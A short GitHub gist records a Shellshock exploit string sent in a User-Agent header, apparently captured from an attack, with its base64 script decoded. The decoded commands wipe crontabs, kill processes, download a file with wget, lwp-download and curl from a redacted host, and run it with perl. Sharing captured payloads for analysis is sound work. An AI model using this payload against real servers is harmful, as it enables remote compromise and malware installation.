Skip to content

Instantly share code, notes, and snippets.

@bkozora
Created February 8, 2017 18:04
Show Gist options
  • Save bkozora/ba859003e8d90a5e91a59b4e681aa3c4 to your computer and use it in GitHub Desktop.
Save bkozora/ba859003e8d90a5e91a59b4e681aa3c4 to your computer and use it in GitHub Desktop.
Shellshock IRC Server Exploit
UA:'() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!";system("echo Y3JvbnRhYiAtcg0Ka2lsbGFsbCAtOSBwZXJsDQpraWxsYWxsIC05IHBocA0KY2QgL3RtcC8NCm1rZGlyIGJhc2guNS40LjMNCmNkIGJhc2guNS40LjMNCndnZXQgaHR0cDovL2lwLmFkZHJlc3MuaW0ubm90LmdpdmluZy9iYXNoLjQuMy4xDQpsd3AtZG93bmxvYWQgaHR0cDovL2lwLmFkZHJlc3MuaW0ubm90LmdpdmluZy9iYXNoLjQuMy4xDQpjdXJsIC1PIGh0dHA6Ly9pcC5hZGRyZXNzLmltLm5vdC5naXZpbmcvYmFzaC40LjMuMQ0KcGVybCBiYXNoLjQuMy4xDQpybSAtcmYgL3RtcC9iYXNoLjUuNC4zDQo= | base64 -d > /tmp/bash-5-1-1 ; sh /tmp/bash-5-1-1");''
The base64 decodes to the following:
crontab -r
killall -9 perl
killall -9 php
cd /tmp/
mkdir bash.5.4.3
cd bash.5.4.3
wget http://ip.address.im.not.giving/bash.4.3.1
lwp-download http://ip.address.im.not.giving/bash.4.3.1
curl -O http://ip.address.im.not.giving/bash.4.3.1
perl bash.4.3.1
rm -rf /tmp/bash.5.4.3
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment